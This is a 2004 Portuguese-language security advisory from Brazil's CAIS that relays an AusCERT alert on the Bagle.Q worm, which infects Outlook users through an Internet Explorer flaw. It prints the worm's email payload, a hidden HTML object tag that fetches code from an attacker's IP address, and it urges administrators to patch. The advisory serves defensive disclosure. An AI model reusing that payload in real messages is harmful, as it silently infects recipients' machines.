RNP - Rede Nacional de Ensino e Pesquisa
 
Segurança de redes 
 

Nova variante do Worm Bagle.Q

AusCERT AL-2004.07

[CAIS, 18.03.2004-13:55, revisão 01]


O CAIS está repassando o alerta divulgado pelo AusCERT, intitulado: "(AUSCERT AL-2004.07) AUSCERT ALERT - Worm Bagle.Q exploits Internet Explorer and Outlook Vulnerability", tratando da propagação de uma variante do worm Bagle.Q que explora vulnerabilidade no Internet Explorer (IE) e Microsoft Outlook.

A variante Q explora uma vulnerabilidade identificada no IE que permite ao worm infectar o sistema sem a intervenção do usuário e sem a presença do executável anexado na mensagem. O Microsoft Outlook é vulnerável a este worm, pois utiliza o IE para visualizar mensagens HTML.

A infecção do sistema ocorre em duas etapas:

  1. Uma mensagem é recebida com o seguinte conteúdo:

    <html><body> <font face="System"> <OBJECT STYLE="display:none" DATA="http://<IP address>:81/373273.php"> </OBJECT></body></html>

  2. A leitura da mensagem com um dos aplicativos de email vulneráveis (Microsoft Outlook e Microsoft Outllok Express), permite que o vírus/worm seja carregado através de uma conexão http ao IP especificado no corpo da mensagem.

Sistemas infectados pelo worm passarão a enviar mensagens para os endereços de email encontrados na máquina vitima.

A vulnerabilidade explorada pelo worm foi descrita nos seguintes alertas:

Em virtude da exploração da vulnerabilidade e da potencial propagação do worm, o CAIS recomenda que sejam aplicadas as correções necessárias com urgência, conforme descrito nos alertas citados acima.

Maiores informações:

O CAIS recomenda aos administradores de plataformas Microsoft que mantenham seus sistemas e aplicativos sempre atualizados.



Centro de Atendimento a Incidentes de Segurança


Referências:

AusCERT AL-2004.07

AusCERT-AL-2004-07.txt download do arquivo

formato: text/xml



Consulta em alertas

 


Contato com o Cais:

+55 (19) 3787-3300
+55 (19) 3787-3301

cais@cais.rnp.br


Chave PGP pública do Cais